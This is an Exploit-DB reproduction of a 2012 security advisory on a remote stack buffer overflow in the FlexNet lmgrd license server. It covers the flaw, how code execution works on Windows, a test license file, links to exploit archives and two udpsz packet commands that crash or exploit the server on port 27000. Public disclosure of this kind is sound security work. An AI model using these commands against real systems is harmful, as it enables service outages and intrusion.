FlexNet License Server Manager Stack Overflow In lmgrd

2012-05-14T00:00:00
ID EDB-ID:18877
Type exploitdb
Reporter Luigi Auriemma
Modified 2012-05-14T00:00:00

Description

FlexNet License Server Manager Stack Overflow In lmgrd. Dos exploits for multiple platform

                                        
                                            #######################################################################

                             Luigi Auriemma

Application:  FlexNet License Server Manager
              http://www.flexerasoftware.com/products/flexnet-publisher.htm
              http://www.globes.com/support/fnp_utilities_download.htm
Versions:     <= 11.9.1 and others earlier (this version number was
              written when I found the advisory many months/years ago)
Platforms:    AIX, HP-UX, Linux, Mac OSX, Windows, SGI, Solaris
Bug:          stack overflow in lmgrd
Exploitation: remote, versus server
Date:         found     26 Oct 2010
              fixed     26 Mar 2012
              advisory  13 May 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


"FlexNet Publisher software licensing makes it easy for software
vendors and high-tech manufacturers to manage, secure, enhance, and
grow market share through flexible pricing, packaging, licensing, and
protection of their software and SaaS offerings."


#######################################################################

======
2) Bug
======


lmgrd is a license server manager listening on port 27000 and usually
running as system service in the products of various vendors like IBM,
HP, Sybase, Citrix, VMWare, SolidWorks and so on, it's just the most
diffused licenses manager.
Exists also another version of the license server called lmadmin that
includes a web interface and is NOT vulnerable but it's not diffused as
lmgrd.

The server is affected by a classical stack buffer-overflow in the
function that copies the data received after the header in a buffer
smaller than the needeed bytes.

On Windows the code execution takes place after the exception in
"REP MOVSD" bypassing the "stack canary" protection.
For example on this platform [ESP+8] points exactly at the position
0x3718 of our data so we can place a jmp back and executing the
shellcode placed before this position.

For running the software is needed a license file so for testing the
things quickly create the folder c:\flexlm, put lmgrd.exe in it and
then create the file license.dat containing the following data and then
launch it (I suggest to use -z for launching it in foreground):

SERVER this_host ANY
VENDOR SYBASE
# The Sybase Software Asset Management License Server will not start unless
# one valid license is present. The following license is not used but will
# allow the License Server to start in the absence of any other licenses.
# Once you have generated served licenses for this License Server at SPDC 
# you should remove this license file.
#
INCREMENT SYSAM_LICENSE_SERVER SYBASE 2.0 permanent 1 ISSUER="Sybase, \
	Inc." ISSUED=14-feb-2007 NOTICE="License to allow the SySAM \
	License Server to start in the absence of any other licenses." \
	SN=12727 SIGN2="075C 3143 F443 BD70 9869 F180 9AF4 B011 3753 \
	A310 510F 6497 6A91 6F8E BD04 11B4 811C B57C 83EB 8F69 F191 \
	499C 2456 5033 B63C 3231 1D5D D269 B7E7 F77A"


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18877.zip

  udpsz -D -T -C "2f 24 189d 4000 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 0x4000

or the max
  udpsz -D -T -C "2f b7 1179 ffff 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 0xffff

note that the 8bit value at offset 1 and the 16bit one at offset 2 are
checksums calculated respectively on the 20 bytes header and the rest
of the data so they must be set correctly in case of modifications to
the packet.


#######################################################################

======
4) Fix
======


Fixed.


#######################################################################